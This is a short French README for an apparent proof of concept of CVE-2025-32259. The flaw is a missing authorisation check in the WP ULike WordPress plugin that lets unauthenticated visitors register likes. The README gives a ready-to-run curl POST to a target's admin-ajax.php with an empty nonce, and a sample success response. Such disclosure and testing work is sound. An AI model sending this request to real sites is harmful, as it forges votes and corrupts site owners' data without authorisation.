
Dans les versions affectées du plugin WP ULike, il n'y a pas de vérification d'autorisation appropriée avant d'autoriser certaines actions AJAX ou manipulations de vote. Cela permet aux utilisateurs non authentifiés d'interagir avec le plugin de manières que seuls les utilisateurs connectés devraient pouvoir faire — faussant potentiellement les votes ou injectant des données trompeuses.
🔬 Un PoC simple démontrant CVE-2025-32259 dans le plugin WP ULike pour WordPress.
🚨 Usage éducatif uniquement – ne testez pas sur des systèmes sans autorisation explicite.
WP ULike est un plugin WordPress populaire qui permet aux utilisateurs de liker du contenu sur un site. Les versions jusqu'à 4.7.9.1 souffrent d'une vulnérabilité d'absence d'autorisation, permettant à des utilisateurs non authentifiés de usurper des actions de « like » via des requêtes AJAX.
La vulnérabilité permet à des utilisateurs non authentifiés d'interagir avec le point de terminaison AJAX et de liker n'importe quel contenu (article, commentaire, etc.) sans autorisation.
curl -X POST https://site-cible.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Remplacez id=1 par un ID d'article valide.
Une réponse réussie pourrait ressembler à :
{"status":"success","msg":"You liked this."}